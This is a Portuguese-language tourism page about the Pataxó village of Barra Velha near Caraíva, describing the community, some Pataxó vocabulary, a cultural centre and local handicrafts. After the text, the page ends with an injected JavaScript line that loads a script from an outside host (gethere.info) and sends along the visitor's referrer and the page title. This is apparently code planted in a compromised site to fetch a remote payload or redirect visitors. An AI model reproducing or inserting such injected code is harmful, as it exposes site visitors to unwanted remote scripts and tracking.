Aldeia Pataxó

Caraíva fica no portal norte de entrada para o Parque Nacional de Monte Pascoal e a reserva indígena Pataxó.

A 6 km ao sul de Caraíva, fica a aldeia Barra Velha, onde vivem aproximadamente 500 famílias Pataxós.

A aldeia possui escolas, posto de saúde e diversas outras benfeitorias.

O modo de fabricação da sua farinha é preservado como na época do descobrimento e, juntamente com o artesanato, forma grande parte da renda dos Pataxós.

Conheça algumas palavras na língua Pataxó:

Cacuçu: homem.

Jokana: mulher.

Jokana Baixu: mulher bonita.

Kitoke: menino.

Kitokere: menina.

Tiaua: papagaio.

Tamicuâm: estrela.

Caiminuan, cauim: bebida fermentada feita de mandioca.

No Centro Cultural de Tradições Indígenas, que fica na subida do rio, é possível conhecer um pouco mais da cultura dos índios Pataxós. Danças, culinária e histórias contatas pelos próprios Pataxós são uma atração à parte.

O artesanato feito pelos Pataxós é mais do que uma alternativa de renda, é uma representação de sua cultura e crença. A diversidade de cores e formas encanta a todos. São colares, pulseiras, prendedores de cabelo, farinheiras, gamelas, colheres e outros utensílios feitos de madeira, penas de aves, fibras e sementes locais. O paraju, madeira de cor vermelha escura, amarronzada, é utilizado para os utensílios domésticos, que chama a atenção pelo esmero no entalhe. Colares, pulseiras e adornos femininos, feitos com sementes de jacarandá, jacanaíba, maçaranduba e outras da região, são de extremo bom gosto. Além dos tradicionais passarinhos de madeira com penas coloridas, que são uma ótima lembrança do lugar.

Todo o artesanato é produzindo com matéria-prima renovável e garante renda e melhores condições de vida para as famílias. O colar para o povo Pataxó representa uma proteção, com a crença de que as sementes e materiais naturais utilizados passam a força da energia da mãe natureza.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;